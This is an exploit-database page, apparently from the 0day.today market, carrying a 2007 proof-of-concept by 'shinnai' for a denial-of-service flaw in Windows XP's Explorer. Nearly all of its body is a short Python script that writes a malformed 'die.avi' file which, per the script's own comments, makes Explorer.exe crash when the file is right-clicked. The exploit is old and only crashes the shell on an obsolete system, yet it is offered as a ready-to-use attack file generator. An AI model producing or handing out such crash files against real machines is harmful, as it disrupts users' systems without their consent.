[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MS Windows Explorer (AVI) Unspecified Denial of Service Exploit

Author
shinnai
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6296
Category
dos / poc
Date add
24-01-2007
Platform
unsorted
===============================================================
MS Windows Explorer (AVI) Unspecified Denial of Service Exploit
===============================================================





print "-----------------------------------------------------------------------------------"
print "Explorer.exe version 6.0.2900.2180 .avi file Denial of Service"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Tested on Windows XP Professional SP2 all patched"
print "right click of the mouse on the file to see Explorer.exe die"
print "-----------------------------------------------------------------------------------"

fileOut = open('die.avi','wb')
fileOut.write('\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00')
fileOut.close()



#  0day.today [2024-11-16]  #